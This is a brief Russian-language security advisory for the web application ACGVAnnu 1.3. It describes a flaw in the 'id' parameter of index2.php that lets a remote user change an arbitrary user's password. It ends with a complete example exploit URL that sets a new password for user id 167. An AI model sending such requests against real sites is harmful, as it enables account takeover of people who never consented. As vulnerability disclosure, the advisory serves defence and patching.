Программа: ACGVAnnu 1.3
Уязвимость позволяет удаленному пользователю сменить пароль произвольному пользователю на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" сценарием index2.php. Удаленный пользователь может выполнить сменить пароль произвольному пользователю на целевой системе.
Пример:
http://www.example.com/index2.php?id=&nom=ajann2&prenom=ajann2&pass=0002455&rubrik= modif&fo_remp=oui&id=167&mail=a&url=http://a&titre=a& descript=+a+&categorie=G%E9n%E9ral&Submit=Gonder
